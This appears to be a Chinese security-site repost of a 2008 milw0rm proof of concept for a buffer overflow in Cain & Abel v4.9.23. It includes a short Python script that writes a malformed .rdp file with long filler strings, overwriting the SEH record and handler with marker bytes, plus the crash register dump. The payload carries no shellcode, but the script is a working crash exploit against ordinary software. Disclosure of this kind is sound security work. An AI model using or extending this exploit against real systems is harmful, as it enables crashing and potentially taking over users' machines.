Cain & Abel v4.9.23 (rdp file) Buffer Overflow PoC 's

admin 2017年5月2日11:59:59评论342 views字数 963阅读3分12秒阅读模式
摘要

# milw0rm.com [2008-11-30]

# exploit.py ########################################################## # Cain & Abel v4.9.23 (rdp file) Buffer Overflow PoC # (other versions may also affected) # By:Encrypt3d.M!nd #    encrypt3d.blogspot.com # # Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder ########################################################## #   # Description: # When Using Remote Desktop Password Decoder in Cain and # Importing ".rdp" file contains long Chars(ex:8250 chars) # The Program Will crash.And The Following Happen: # # EAX:41414141  ECX:7C832648  EDX:41414142  EBX:00000000 # ESP:0012BCD4  EBP:0012BCD4  ESI:001F07A8  EDI:00000001 # EIP:7E43C201 USER32.7E43C201 # # Access violation When Reading [41414141] # # And Also The Pointer to next SEH record and SE Handler # Will gonna BE Over-wrote # # This Poc Will Gonna Overwrite the Pointer to next SEH # With"42424242" and The SE Handler with"43434343" # ########################################################## chars = "A"*8194 ptns = "B"*4 shan = "C"*4 chars2 = "A"*200  exp=open('cain.rdp','w') exp.write(chars+ptns+shan+chars2) exp.close()

# milw0rm.com [2008-11-30]

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年5月2日11:59:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Cain & Abel v4.9.23 (rdp file) Buffer Overflow PoC 'shttp://cn-sec.com/archives/45848.html

发表评论

匿名网友 填写信息